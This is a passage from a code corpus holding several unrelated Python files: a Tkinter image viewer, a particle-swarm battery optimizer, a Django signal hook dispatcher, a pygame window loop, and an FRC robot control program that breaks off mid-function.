-*-\n\"\"\"The image-viewer for Quiver.\"\"\"\n\nimport tkinter as tk\nfrom tkinter import ttk\nimport idlelib.ToolTip\nimport os\n\nimport pkinter as pk\nfrom PIL import Image, ImageTk\n\nimport load_images\n\n__title__ = \"Painting\"\n__author__ = \"DeflatedPickle\"\n__version__ = \"1.11.1\"\n\n\nclass ImageViewer(tk.Toplevel):\n def __init__(self, parent, *args, **kwargs):\n tk.Toplevel.__init__(self, parent, *args, **kwargs)\n self.parent = parent\n self.title(\"Painting\")\n self.geometry(\"500x400\")\n self.minsize(width=300, height=200)\n self.maxsize(width=1000, height=800)\n # self.transient(parent)\n self.rowconfigure(1, weight=1)\n self.columnconfigure(0, weight=1)\n\n self.image_open = None\n self.image_photo = None\n self.drawn_image = None\n\n self.original_width = 0\n self.original_height = 0\n\n self.zoom_width = 0\n self.zoom_height = 0\n\n self.zoom_speed = 16\n self.zoom_current = 1\n\n self.scroll_past_horizontally = 50\n self.scroll_past_vertically = 50\n\n self.menu = Menu(self)\n\n self.toolbar = Toolbar(self)\n self.toolbar.grid(row=0, column=0, sticky=\"we\")\n\n self.statusbar = Statusbar(self)\n self.statusbar.grid(row=2, column=0, sticky=\"we\")\n\n ##################################################\n\n self.widget_frame_image = ttk.Frame(self)\n self.widget_frame_image.grid(row=1, column=0, sticky=\"nesw\")\n self.widget_frame_image.rowconfigure(0, weight=1)\n self.widget_frame_image.columnconfigure(0, weight=1)\n self.widget_frame_image.bind_all(\"\", self.zoom_handler)\n self.widget_frame_image.bind_all(\"\", self.zoom_handler)\n self.widget_frame_image.bind_all(\"\", self.zoom_handler)\n self.widget_frame_image.bind_all(\"\", self.on_enter)\n self.widget_frame_image.bind_all(\"\", self.on_leave)\n\n self.widget_canvas_image = tk.Canvas(self.widget_frame_image)\n self.widget_canvas_image.grid(row=0, column=0)\n\n self.widget_scrollbar_horizontal = ttk.Scrollbar(self.widget_frame_image, orient=\"horizontal\",\n command=self.widget_canvas_image.xview)\n self.widget_scrollbar_horizontal.grid(row=1, column=0, sticky=\"we\")\n\n self.widget_scrollbar_vertical = ttk.Scrollbar(self.widget_frame_image, orient=\"vertical\",\n command=self.widget_canvas_image.yview)\n self.widget_scrollbar_vertical.grid(row=0, column=1, sticky=\"ns\")\n\n self.widget_canvas_image.configure(xscrollcommand=self.widget_scrollbar_horizontal.set,\n yscrollcommand=self.widget_scrollbar_vertical.set)\n\n self.check_zoom()\n\n def zoom_handler(self, event):\n if event.delta == 120 or event.num == 4:\n if self.zoom_current < 16:\n self.zoom_in()\n\n elif event.delta == -120:\n if self.zoom_current > 1 or event.num == 5:\n self.zoom_out()\n\n def load_image(self, image=\"\"):\n self.widget_canvas_image.delete(\"all\")\n\n self.image_open = Image.open(image, \"r\")\n self.image_photo = ImageTk.PhotoImage(self.image_open)\n\n self.original_width = self.image_photo.width()\n self.original_height = self.image_photo.height()\n\n self.widget_canvas_image.configure(scrollregion=(0, 0, self.image_photo.width(), self.image_photo.height()))\n self.widget_canvas_image.configure(width=self.image_photo.width(), height=self.image_photo.height())\n self.drawn_image = self.widget_canvas_image.create_image(0, 0, anchor=\"nw\", image=self.image_photo,\n tags=\"image\")\n self.title(\"{} - {}\".format(self.title(), \"\".join(os.path.splitext(image))))\n\n self.check_tile_buttons()\n self.draw_background()\n\n def draw_background(self):\n self.widget_canvas_image.delete(\"chessboard\")\n self.widget_canvas_image.delete(\"grid\")\n\n if self.toolbar.variable_chessboard.get():\n colour1 = \"white\"\n colour2 = \"light grey\"\n colour = colour2\n for row in range(self.original_height - (16 - self.zoom_current) + 1):\n colour = colour1 if colour == colour2 else colour2\n for col in range(self.original_width - (16 - self.zoom_current) + 1):\n # print(self.zoom_current)\n x1 = (col * 16)\n y1 = (row * 16)\n x2 = x1 + 16\n y2 = y1 + 16\n self.widget_canvas_image.create_rectangle(x1, y1, x2, y2, outline=colour, fill=colour,\n tags=\"chessboard\")\n colour = colour1 if colour == colour2 else colour2\n\n # self.widget_canvas_image.lift(self.drawn_image)\n self.widget_canvas_image.lift(\"image\")\n\n if self.toolbar.variable_grid.get():\n colour3 = \"light grey\"\n for row in range(self.original_height - (16 - self.zoom_current) + 1):\n colour = colour3\n for col in range(self.original_width - (16 - self.zoom_current) + 1):\n # print(self.zoom_current)\n x1 = (col * 16)\n y1 = (row * 16)\n x2 = x1 + 16\n y2 = y1 + 16\n self.widget_canvas_image.create_rectangle(x1, y1, x2, y2, outline=colour, fill=None, tags=\"grid\")\n colour = colour\n\n def zoom_in(self):\n self.widget_canvas_image.delete(\"image\")\n\n self.image_photo = ImageTk.PhotoImage(self.image_open.resize(\n (self.image_photo.width() + self.original_width, self.image_photo.height() + self.original_height)))\n self.widget_canvas_image.configure(scrollregion=(self.check_scrollregion()))\n self.widget_canvas_image.configure(width=self.check_size()[0], height=self.check_size()[1])\n # self.drawn_image = self.widget_canvas_image.create_image(0, 0, anchor=\"nw\", image=self.image_photo, tags=\"image\")\n\n self.zoom_current += 1\n # print(self.zoom_current)\n\n self.zoom_width = self.image_photo.width()\n self.zoom_height = self.image_photo.height()\n\n self.draw_tiles()\n self.draw_background()\n self.check_zoom()\n\n def zoom_out(self):\n self.widget_canvas_image.delete(\"image\")\n\n self.image_photo = ImageTk.PhotoImage(self.image_open.resize(\n (self.image_photo.width() - self.original_width, self.image_photo.height() - self.original_height)))\n self.widget_canvas_image.configure(scrollregion=(self.check_scrollregion()))\n self.widget_canvas_image.configure(width=self.check_size()[0], height=self.check_size()[1])\n # self.drawn_image = self.widget_canvas_image.create_image(0, 0, anchor=\"nw\", image=self.image_photo, tags=\"image\")\n\n self.zoom_current -= 1\n # print(self.zoom_current)\n\n self.zoom_width = self.image_photo.width()\n self.zoom_height = self.image_photo.height()\n\n self.draw_tiles()\n self.draw_background()\n self.check_zoom()\n\n def check_scrollregion(self):\n if self.toolbar.variable_tile.get():\n return 0, 0, self.image_photo.width() * 3, self.image_photo.height() * 3\n\n else:\n return 0, 0, self.image_photo.width(), self.image_photo.height()\n\n def check_size(self):\n if self.toolbar.variable_tile.get():\n return self.image_photo.width() * 3, self.image_photo.height() * 3\n\n else:\n return self.image_photo.width(), self.image_photo.height()\n\n def check_zoom(self):\n if self.zoom_current > 15:\n self.toolbar.widget_button_zoom_in.configure(state=\"disabled\")\n else:\n self.toolbar.widget_button_zoom_in.configure(state=\"enabled\")\n\n if self.zoom_current < 2:\n self.toolbar.widget_button_zoom_out.configure(state=\"disabled\")\n else:\n self.toolbar.widget_button_zoom_out.configure(state=\"enabled\")\n\n def check_tile_buttons(self):\n if self.toolbar.variable_tile.get():\n self.toolbar.widget_button_tile_sides.configure(state=\"normal\")\n self.toolbar.widget_button_tile_corners.configure(state=\"normal\")\n\n elif not self.toolbar.variable_tile.get():\n self.toolbar.widget_button_tile_sides.configure(state=\"disabled\")\n self.toolbar.widget_button_tile_corners.configure(state=\"disabled\")\n\n self.widget_canvas_image.create_image(0, 0, anchor=\"nw\", image=self.image_photo, tags=\"image\")\n self.widget_canvas_image.configure(width=self.image_photo.width(), height=self.image_photo.height())\n\n def draw_tiles(self):\n for item in [\"image\", \"image_top\", \"image_bottom\", \"image_left\", \"image_right\", \"image_top_left\", \"image_top_right\", \"image_bottom_left\", \"image_bottom_right\"]:\n self.widget_canvas_image.delete(item)\n\n self.widget_canvas_image.create_image(self.image_photo.width(), self.image_photo.height(), anchor=\"nw\", image=self.image_photo, tags=\"image\")\n\n if self.toolbar.variable_tile_sides.get():\n # self.widget_canvas_image.move(\"image\", self.image_photo.width(), self.image_photo.height())\n\n self.widget_canvas_image.create_image(self.image_photo.width(), 0, anchor=\"nw\", image=self.image_photo, tags=\"image_top\")\n self.widget_canvas_image.create_image(self.image_photo.width(), self.image_photo.height() * 2, anchor=\"nw\", image=self.image_photo, tags=\"image_bottom\")\n self.widget_canvas_image.create_image(0, self.image_photo.height(), anchor=\"nw\", image=self.image_photo, tags=\"image_left\")\n self.widget_canvas_image.create_image(self.image_photo.width() * 2, self.image_photo.height(), anchor=\"nw\", image=self.image_photo, tags=\"image_right\")\n\n if self.toolbar.variable_tile_corners.get():\n self.widget_canvas_image.create_image(0, 0, anchor=\"nw\", image=self.image_photo, tags=\"image_top_left\")\n self.widget_canvas_image.create_image(self.image_photo.width() * 2, 0, anchor=\"nw\", image=self.image_photo, tags=\"image_top_right\")\n self.widget_canvas_image.create_image(0, self.image_photo.height() * 2, anchor=\"nw\", image=self.image_photo, tags=\"image_bottom_left\")\n self.widget_canvas_image.create_image(self.image_photo.width() * 2, self.image_photo.height() * 2, anchor=\"nw\", image=self.image_photo, tags=\"image_bottom_right\")\n\n self.widget_canvas_image.configure(width=self.image_photo.width() * 3, height=self.image_photo.height() * 3)\n\n def on_enter(self, event):\n self.widget_frame_image.bind_all(\"\", self.on_scroll_vertical)\n self.widget_frame_image.bind_all(\"\", self.on_scroll_horizontal)\n\n del event\n\n def on_leave(self, event):\n self.widget_frame_image.unbind_all(\"\")\n self.widget_frame_image.unbind_all(\"\")\n\n del event\n\n def on_scroll_vertical(self, event):\n self.widget_canvas_image.yview_scroll(int(-1 * (event.delta / 120)), \"units\")\n\n def on_scroll_horizontal(self, event):\n self.widget_canvas_image.xview_scroll(int(-1 * (event.delta / 120)), \"units\")\n\n\nclass Menu(tk.Menu):\n def __init__(self, parent, *args, **kwargs):\n tk.Menu.__init__(self, parent, type=\"menubar\", *args, **kwargs)\n self.option_add('*tearOff', False)\n self.parent = parent\n\n\nclass Toolbar(ttk.Frame):\n def __init__(self, parent, **kwargs):\n ttk.Frame.__init__(self, parent, **kwargs)\n self.parent = parent\n\n # TODO: Change this to a pk.Toolbar.\n\n image = load_images.LoadImages()\n self.image_chessboard = image.image_chessboard\n self.image_grid = image.image_grid\n self.image_zoom_in = image.image_zoom_in\n self.image_zoom_out = image.image_zoom_out\n\n self.variable_chessboard = tk.BooleanVar()\n self.variable_chessboard.set(True)\n self.widget_check_chessboard = ttk.Checkbutton(self, text=\"Chessboard\", image=self.image_chessboard,\n variable=self.variable_chessboard,\n command=self.parent.draw_background, style=\"Toolbutton\")\n self.widget_check_chessboard.grid(row=0, column=0)\n\n self.variable_grid = tk.BooleanVar()\n self.variable_grid.set(False)\n self.widget_check_grid = ttk.Checkbutton(self, text=\"Grid\", image=self.image_grid, variable=self.variable_grid,\n command=self.parent.draw_background, style=\"Toolbutton\")\n self.widget_check_grid.grid(row=0, column=1)\n\n ttk.Separator(self, orient=\"vertical\").grid(row=0, column=2, sticky=\"ns\")\n\n self.widget_button_zoom_in = ttk.Button(self, text=\"Zoom In\", image=self.image_zoom_in,\n command=self.parent.zoom_in, style=\"Toolbutton\")\n self.widget_button_zoom_in.grid(row=0, column=3)\n\n self.widget_button_zoom_out = ttk.Button(self, text=\"Zoom Out\", image=self.image_zoom_out,\n command=self.parent.zoom_out, style=\"Toolbutton\")\n self.widget_button_zoom_out.grid(row=0, column=4)\n idlelib.ToolTip.ToolTip(self.widget_button_zoom_out, \"Zoom the image out\")\n\n ttk.Separator(self, orient=\"vertical\").grid(row=0, column=5, sticky=\"ns\")\n\n self.variable_tile = tk.BooleanVar()\n self.widget_button_tile = ttk.Checkbutton(self, text=\"Tile\", variable=self.variable_tile,\n command=self.parent.check_tile_buttons, style=\"Toolbutton\")\n self.widget_button_tile.grid(row=0, column=6)\n\n self.variable_tile_sides = tk.BooleanVar()\n self.widget_button_tile_sides = ttk.Checkbutton(self, text=\"Tile Side\", variable=self.variable_tile_sides, command=self.parent.draw_tiles, style=\"Toolbutton\")\n self.widget_button_tile_sides.grid(row=0, column=7)\n\n self.variable_tile_corners = tk.BooleanVar()\n self.widget_button_tile_corners = ttk.Checkbutton(self, text=\"Tile Corners\", variable=self.variable_tile_corners, command=self.parent.draw_tiles, style=\"Toolbutton\")\n self.widget_button_tile_corners.grid(row=0, column=8)\n\n\nclass Statusbar(pk.Statusbar):\n def __init__(self, parent, *args):\n pk.Statusbar.__init__(self, parent, *args)\n\n self.status_variable = tk.StringVar()\n self.add_variable(variable=self.status_variable)\n\n self.bind_widget(parent.toolbar.widget_check_chessboard, self.status_variable, \"Show or hide the chessboard\",\n \"\")\n self.bind_widget(parent.toolbar.widget_check_grid, self.status_variable, \"Show or hide the grid\", \"\")\n\n self.bind_widget(parent.toolbar.widget_button_zoom_in, self.status_variable, \"Zoom the image in\", \"\")\n self.bind_widget(parent.toolbar.widget_button_zoom_out, self.status_variable, \"Zoom the image out\", \"\")\n\n self.add_sizegrip()\n\n\ndef main():\n app = tk.Tk()\n image_viewer = ImageViewer(app)\n image_viewer.load_image(\"./test_files/cobblestone.png\")\n # image_viewer.load_image(\"./icons/nbt.png\")\n app.mainloop()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"image_viewer.py","file_name":"image_viewer.py","file_ext":"py","file_size_in_byte":15633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"489663456","text":"import pyswarm as ps\nimport numpy as np\nfrom models.optimizer import *\nimport features.costFunctionStrategies as strategy\n\nclass ModelThreePSOOptimizer(Optimizer):\n\n def __init__(self, ids, dateTime, loadGrid, loadCons, loadProd):\n super().__init__(ids, dateTime, loadGrid, loadCons, loadProd)\n # self.lb = [0] * len(self.loadCons)\n # self.ub = [0.01] + [self.batteryCapacity] * (len(self.loadCons) - 1)\n # self.fopt = 0\n self.lb = np.array([])\n self.ub = np.array([])\n self.newGrid = np.array([])\n self.prodUsage = np.array([])\n self.battCharge = np.array([])\n self.prices = np.array(self.prices)\n \n def optimize(self):\n\n numberOfDays = int (len(self.dateTime) / 24)\n oneDayLb = 0\n oneDayUb = 0\n oneDayNewGrid = 0\n oneDayProdUsage = 0\n oneDayBattCharge = 0\n\n for idx, (oneDayLoadCons, oneDayLoadProd, oneDayPrices) in enumerate(zip(np.split(self.loadCons, numberOfDays), np.split(self.loadProd, numberOfDays), np.split(self.prices, numberOfDays))):\n \n oneDayLb = [0] * 24\n if idx is 0:\n oneDayUb = [0.01] + [self.batteryCapacity] * 23\n else:\n oneDayUb = [0.01 if self.battCharge[-1] <= 0 else self.battCharge[-1]] + [self.batteryCapacity] * 23\n\n\n oneDayBattCharge, fopt = ps.pso(strategy.costFuncOnMinPrice,\n oneDayLb,\n oneDayUb,\n args=(oneDayLoadCons, oneDayLoadProd, oneDayPrices),\n debug=False,\n swarmsize=20,\n maxiter=100000)\n \n oneDayNewGrid = strategy.newGridEvolution(oneDayBattCharge, oneDayLoadCons, oneDayLoadProd)\n oneDayProdUsage = strategy.costEvolutionProduction(oneDayBattCharge, oneDayLoadCons, oneDayLoadProd)\n\n self.lb = np.append(self.lb, oneDayLb)\n self.ub = np.append(self.ub, oneDayUb)\n self.newGrid = np.append(self.newGrid, oneDayNewGrid)\n self.prodUsage = np.append(self.prodUsage, oneDayProdUsage)\n self.battCharge = np.append(self.battCharge, oneDayBattCharge) \n \n def getReport(self):\n updateDict = super().getReport()\n updateDict.update({ \"lb\": self.lb,\n \"ub\": self.ub,\n # \"fopt\": self.fopt\n })\n return updateDict","sub_path":"src/models/modelThreePSOOptimizer.py","file_name":"modelThreePSOOptimizer.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"591251497","text":"#-*- coding: utf-8 -*-\n\nfrom django.dispatch import Signal\n\n\n__all__ = ['hook', ]\n\n\nclass Hook(object):\n \"\"\"\n A dynamic-signal dispatcher.\n\n thread-safety: it's not thread safe, this may change\n in the future if a RLock is added around _registry operations.\n In the meanwhile, you should register/connect/disconnect\n at import time (global scope) to ensure thread-safety,\n models.py and urls.py are good places (django<=1.6)\n or do it in the AppConfig.ready() method (django>=1.7).\n \"\"\"\n def __init__(self):\n self._registry = {}\n\n def register(self, name):\n \"\"\"\n Registers a new hook. Not required (see connect method).\n\n @name: the hook name.\n \"\"\"\n signal = Signal(providing_args=['args', 'kwargs'])\n self._registry[name] = signal\n return signal\n\n def connect(self, name, func, sender=None, dispatch_uid=None):\n \"\"\"\n Connects a function to a hook. Creates the hook-name if it does not exists.\n\n @name: the hook name.\n @func: a function reference, must return a string.\n @sender: optional sender __class__ to which this func should respond. Default will match all.\n @dispatch_uid: optional unique id, see django Signals for more info.\n \"\"\"\n try:\n signal = self._registry[name]\n except KeyError:\n signal = self.register(name)\n\n signal.connect(func, sender=sender, dispatch_uid=dispatch_uid)\n\n def disconnect(self, name, func, dispatch_uid=None):\n \"\"\"\n Disconnects a function from a hook.\n\n @name: the hook name.\n @func: a function reference.\n @dispatch_uid: optional unique id, see django Signals for more info.\n \"\"\"\n try:\n signal = self._registry[name]\n except KeyError:\n return\n\n signal.disconnect(func, dispatch_uid=dispatch_uid)\n\n def send(self, name, sender=None, **kwargs):\n \"\"\"\n Sends the signal. Returns every function response\n that was hooked to hook-name as a list: [(func, response), ].\n\n @name: the hook name.\n @sender: optional sender __class__, see connect method.\n \"\"\"\n try:\n signal = self._registry[name]\n except KeyError:\n return []\n\n return signal.send(sender=sender, **kwargs)\n\nhook = Hook()","sub_path":"hooks/signalhook.py","file_name":"signalhook.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"70175521","text":"import pygame\n\npygame.init()\n\ndisplay = pygame.display.set_mode((640, 480))\npygame.display.set_caption(\"My Game Window\")\nclock = pygame.time.Clock()\n\ncrash = False\n\nwhile not crash:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n crash = True\n\n print(event)\n\n pygame.display.update()\n clock.tick(60)\n\npygame.quit()\nquit()\n","sub_path":"PyGame/PyGame01.py","file_name":"PyGame01.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"215440201","text":"#Librerias necesarias para el uso de todo el codigo\n\n# from networktables import NetworkTables\nimport wpilib\nfrom wpilib.drive import MecanumDrive\nfrom state import state\nimport oi\nimport time\n\n\nclass MyRobot(wpilib.TimedRobot):\n\n\tdef robotInit(self):\n\n\t\t# NetworkTables.initialize()\n\t\t# self.sd = NetworkTables.getTable('SmartDashboard')\n\t\twpilib.CameraServer.launch()\n\n\t\t# Inicializadores_de_PCM (en caso de que no arranque el PCM)\n\n\t\t# self.Compressor.setClosedLoopControl(True)\n\t\t# self.enabled = self.Compressor.enabled()\n\n\t\t#Solenoides y Compresores\n\t\t\n\t\tself.Compressor = wpilib.Compressor(0)\n\t\tself.PSV = self.Compressor.getPressureSwitchValue()\n\t\tself.piston = wpilib.Solenoid(0,0)\n\t\tself.impulsor_frontal = wpilib.DoubleSolenoid(0,2,3)\n\t\tself.impulsor_trasero = wpilib.DoubleSolenoid(0,4,5)\n\n\t\t# Encoders y otros Sensores\n\t\t\n\t\tself.encoder = wpilib.Encoder(8, 7)\n\n\t\tself.left_sensor = wpilib.DigitalInput(0)\n\t\tself.principal_sensor = wpilib.DigitalInput(1)\n\t\tself.right_sensor = wpilib.DigitalInput(2)\n\n\t\tself.ultrasonic= wpilib.Ultrasonic(3,4)\n\n\t\tself.prueba_sensor = wpilib.DigitalInput(5)\n\n\n\n\t\tself.P = 0.2\n\t\tself.I = 0\n\t\tself.D = 0\n\n\t\tself.integral = 0\n\t\tself.previous_error = 0\n\n\t\t# Contador y Control\n\n\t\tself.timer = wpilib.Timer()\n\n\t\t# Motores del Chasis\n\n\t\tself.front_left_motor = wpilib.Talon(0)\n\t\tself.rear_left_motor = wpilib.Talon(1)\n\t\tself.front_right_motor = wpilib.Talon(2)\n\t\tself.rear_right_motor = wpilib.Talon(3)\n\n\t\t\n\n\t\t#lift and claw motors\n\n\t\tself.lift_motor = wpilib.Talon(4)\n\t\tself.lift_motor_2 = wpilib.Talon(5)\n\n\n\n\t\t#Union de los motores para su funcionamiento\n\t\t# en conjunto de mecaunm\n\n\t\tself.drive = MecanumDrive(\n\t\t\tself.front_left_motor,\n\t\t\tself.rear_left_motor,\n\t\t\tself.front_right_motor,\n\t\t\tself.rear_right_motor)\n\n\t\t#Motor impulsor \n\n\t\tself.motor_impulsor = wpilib.Talon(6)\n\n\n\t\t\n\tdef autonomousInit(self):\n\n\t\tself.timer.reset()\n\t\tself.timer.start()\n\t\tstate[\"timer_piston\"] = 0\n\t\t\n\tdef autonomousPeriodic(self):\n\n\t\tif self.timer.get() < .8:\n\t\t\tself.drive.driveCartesian(0,-0.9,0,0)\n\t\t\tprint (\"salto de la plataforma hacia atrás\")\n\t\telif self.timer.get() < 3:\n\t\t\tself.drive.driveCartesian(0,-0.1,0,0)\n\t\t\tprint (\"avanza un poco más, en reversa\")\n\t\telif self.timer.get() < 4.35:\n\t\t\tself.drive.driveCartesian(0,0,-0.4,0)\n\t\t\tprint (\"gira en su propio eje derecha/izquierda?\")\n\t\telif self.timer.get() < 6:\n\t\t\tself.timer.stop()\n\t\t\t# while self.prueba_sensor.get():\n\t\t\twhile self.ultrasonic.getRangeMM() < 20 and self.ultrasonic.getRangeMM() > 0:\n\t\t\t\tprint (\"en modo de infrarrojos\")\n\t\t\t\tif self.principal_sensor.get():\n\t\t\t\t\tself.drive.driveCartesian(0, 0, 0, 0)\n\t\t\t\t\tself.timer.start()\n\t\t\t\t\tbreak\n\n\t\t\t\telif self.left_sensor.get():\n\t\t\t\t\tself.drive.driveCartesian(0.2, 0, 0, 0)\n\t\t\t\telif self.right_sensor.get():\n\t\t\t\t\tself.drive.driveCartesian(-0.2, 0 ,0, 0)\n\t\t\t\telse:\n\t\t\t\t\tself.drive.driveCartesian(0, -0.2, 0, 0)\n\n\t\t\telse:\n\t\t\t\tself.drive.driveCartesian(0,0.3,0,0)\n\t\t\t\tprint (\"avanza hacia adelante hasta ultra detect\")\n\t\n\t\telif self.timer.get() < 6.5:\n\t\t\tself.piston.set(True)\n\t\t\tprint (\"psss lanzar\")\n\n\t\telif self.timer.get() < 7:\n\t\t\tself.piston.set(False)\n\t\t\tprint (\"psss retraer\")\n\n\n\t\telse:\n\t\t\tprint (\"autonomo terminado\")\n\t\t\tself.drive.driveCartesian(0,0,0,0)\n\t\t\n\n\n\n\n\n\tdef teleopPeriodic(self):\n\n\t\t#se leen constantemente los botones,joysticks y cambia de modalidades de controles\n\n\t\toi.read_control_inputs(state[\"Controller\"])\n\t\tself.PID()\n\t\tself.timer.start()\n\n\t\t# Funcion del Encoder\n\n\t\tdef Encoder(setpoint):\n\n\t\t\tstate[\"setpoint\"] = setpoint\n\n\t\t\tif self.rcw >= 660:\n\t\t\t\tstate[\"lift_motor\"] = 0.5\n\t\t\telif self.rcw <= 660 and self.rcw >= 460:\n\t\t\t\tstate[\"lift_motor\"] = 0.45\n\t\t\telif self.rcw <= 460 and self.rcw >= 300:\n\t\t\t\tstate[\"lift_motor\"] = 0.4\n\t\t\telif self.rcw <= 300 and self.rcw >= 200:\n\t\t\t\tstate[\"lift_motor\"] = 0.35\n\t\t\telif self.rcw <= 200 and self.rcw >= 102:\n\t\t\t\tstate[\"lift_motor\"] = 0.3\n\t\t\telif self.rcw <= 102.00:\n\t\t\t\tstate[\"lift_motor\"] = 0\n\n\n\t\tif state[\"codewide_breaker\"] == False:\t\n\n\t\t\t# Movimiento manual de las mecanum, align y turbo\n\n\t\t\tx = state[\"mov_x\"] \n\t\t\ty = state[\"mov_y\"] \n\t\t\tz = state[\"mov_z\"] \n\n\t\t\tpowerX = 0 if x < 0.10 and x > -0.10 else x\n\t\t\tpowerY = 0 if y < 0.10 and y > -0.10 else y\n\t\t\tpowerZ = 0 if z < 0.10 and z > -0.10 else z\n\t\t\n\n\t\t\tif state[\"align_activated\"]:\n\n\t\t\t\tif self.principal_sensor.get():\n\t\t\t\t\tself.drive.driveCartesian(0, 0, 0, 0)\n\t\t\t\telif self.left_sensor.get():\n\t\t\t\t\tself.drive.driveCartesian(0.2, 0, 0, 0)\n\t\t\t\telif self.right_sensor.get():\n\t\t\t\t\tself.drive.driveCartesian(-0.2, 0 ,0, 0)\n\t\t\t\telse:\n\t\t\t\t\tself.drive.driveCartesian(0, -0.2, 0, 0)\n\n\n\t\t\telif state[\"turbo_activated\"]:\n\n\t\t\t\tself.drive.driveCartesian(powerX ,-powerY , powerZ, 0)\n\n\t\t\telse:\n\t\t\t\tself.drive.driveCartesian(powerX * 0.6,-powerY * 0.6, powerZ * 0.5, 0)\n\n\n\t\t\t# Configuracion para el elevador automaticamente\n\n\t\t\t# Hatch panel medio y piston\n\t\t\t\n\n\t\t\tif state[\"position\"] == \"media\" and state[\"mechanism\"] == \"piston\":\n\t\t\t\tstate[\"timer_lift_middle\"] += 1\n\t\t\t\tif state[\"timer_lift_middle\"] < 240:\n\t\t\t\t\tEncoder(1621) \n\t\t\t\telif state[\"timer_lift_middle\"] < 275:\n\t\t\t\t\tstate[\"piston_activated\"] = True\n\t\t\t\telif state[\"timer_lift_middle\"] < 310:\n\t\t\t\t\tstate[\"piston_activated\"] = False\n\t\t\t\telif state[\"timer_lift_middle\"] < 510:\n\t\t\t\t\tstate[\"lift_motor\"] = -0.5\n\t\t\t\telse:\n\t\t\t\t\tstate[\"timer_lift_middle\"] = 0\n\t\t\t\t\tstate[\"position\"] = \"neutral\"\n\t\t\t\t\tstate[\"mechanism\"] = \"neutral\"\n\n\t\t\tif state[\"position\"] == \"high\" and state[\"mechanism\"] == \"piston\":\n\t\t\t\tstate[\"timer_lift_taller\"] += 1\n\t\t\t\tif state[\"timer_lift_taller\"] < 240:\n\t\t\t\t\tEncoder(1621) \n\t\t\t\telif state[\"timer_lift_taller\"] < 275:\n\t\t\t\t\tstate[\"piston_activated\"] = True\n\t\t\t\telif state[\"timer_lift_taller\"] < 310:\n\t\t\t\t\tstate[\"piston_activated\"] = False\n\t\t\t\telif state[\"timer_lift_taller\"] < 510:\n\t\t\t\t\tstate[\"lift_motor\"] = -0.5\n\t\t\t\telse:\n\t\t\t\t\tstate[\"timer_lift_taller\"] = 0\n\t\t\t\t\tstate[\"position\"] = \"neutral\"\n\t\t\t\t\tstate[\"mechanism\"] = \"neutral\"\n\n\t\t\t# Configuracion para mover el elevador y la claw manualmente \n\n\n\t\t\tself.lift_motor.set(state[\"lift_motor\"])\n\t\t\tself.lift_motor_2.set(state[\"lift_motor\"])\n\n\n\t\t\t# Pistons (manual) and Compressors (automatico)\n\n\n\t\t\tself.piston.set(state[\"piston_activated\"])\n\n\t\t\tif self.PSV:\n\t\t\t\tself.Compressor.stop()\n\t\t\telse:\n\t\t\t\tself.Compressor.start()\n\n\t\t\t# Immpulsor (Manual y automaticamente)\n\n\t\t\tself.impulsor_frontal.set(state[\"impulsor_situation_front\"])\n\t\t\tself.impulsor_trasero.set(state[\"impulsor_situation_trasero\"])\n\t\t\tself.motor_impulsor.set(state[\"impulsor_motor\"])\n\n\n\t\t\tif state[\"impulsor_on\"] or state[\"timer_impulsor\"] != 0:\n\t\t\t\tstate[\"timer_impulsor\"] += 1\n\t\t\t\n\t\t\t\tif state[\"timer_impulsor\"] < 150:\n\t\t\t\t\tstate[\"impulsor_situation_front\"] = 1\n\t\t\t\t\tstate[\"impulsor_situation_trasero\"] = 1\n\t\t\t\telif state[\"timer_impulsor\"] < 180:\n\t\t\t\t\tstate[\"impulsor_situation_front\"] = 0\n\t\t\t\t\tstate[\"impulsor_situation_trasero\"] = 0\n\t\t\t\telif state[\"timer_impulsor\"] < 250:\n\t\t\t\t\tstate[\"impulsor_motor\"] = 1\n\t\t\t\telif state[\"timer_impulsor\"] < 400:\n\t\t\t\t\tstate[\"impulsor_situation_front\"] = 2\n\t\t\t\t\tstate[\"impulsor_motor\"] = 1\n\t\t\t\t\tself.drive.driveCartesian(0,0.4,0,0)\n\t\t\t\telif state[\"timer_impulsor\"] < 600:\n\t\t\t\t\tstate[\"impulsor_situation_trasero\"] = 2\n\t\t\t\t\tstate[\"impulsor_motor\"] = 0\n\t\t\t\telif state[\"timer_impulsor\"] < 700:\n\t\t\t\t\tself.drive.driveCartesian(0,0.6,0,0)\n\t\t\t\t\tstate[\"impulsor_situation_trasero\"] = 0\n\t\t\t\telse:\n\t\t\t\t\tstate[\"timer_impulsor\"] = 0\n\t\t\t\t\tstate[\"impulsor_situation_front\"] = 0\n\t\t\t\t\tstate[\"impulsor_situation_trasero\"] = 0\n\t\t\t\t\tstate[\"impulsor_motor\"] = 0\n\t\t\t\t\tself.drive.driveCartesian(0,0,0,0)\n\t\t\telse:\n\t\t\t\tpass\n\n\t\telse:\n\t\t\tself.drive.driveCartesian(0,0,0,0)\n\t\t\tself.impulsor_frontal.set(0)\n\t\t\tself.impulsor_trasero.set(0)\n\t\t\tself.motor_impulsor.set(0)\n\t\t\tself.piston.set(False)\n\t\t\tself.lift_motor.set(0)\n\t\t\tself.lift_motor_2.set(0)\n\n\t\t\tstate[\"impulsor_trasero\"] = 0\n\t\t\tstate[\"impulsor_frontal\"] = 0\n\t\t\tstate[\"impulsor_situation_trasero\"] = 0\n\t\t\tstate[\"impulsor_situation_front\"] = 0\n\t\t\tstate[\"impulsor_motor\"] = 0\n\t\t\tstate[\"piston_activated\"] = False\n\t\t\tstate[\"lift_motor\"] = 0\n\t\t\tstate[\"position\"] = \"neutral\"\n\t\t\tstate[\"mechanism\"] = \"neutral\"\n\t\t\tstate[\"timer_piston\"] = 0\n\t\t\tstate[\"timer_impulsor\"] = 0\n\t\t\tstate[\"timer_lift_taller\"] = 0\n\t\t\tstate[\"timer_lift_middle\"] = 0\n\t\t\tstate[\"align_activated\"] = False\n\t\t\tstate[\"turbo_activated\"] = False\n\t\t\n\n\n\tdef PID (self):\n\n\t\terror = state[\"setpoint\"] - 400#self.encoder.get()\n\t\tself.integral = self.integral + 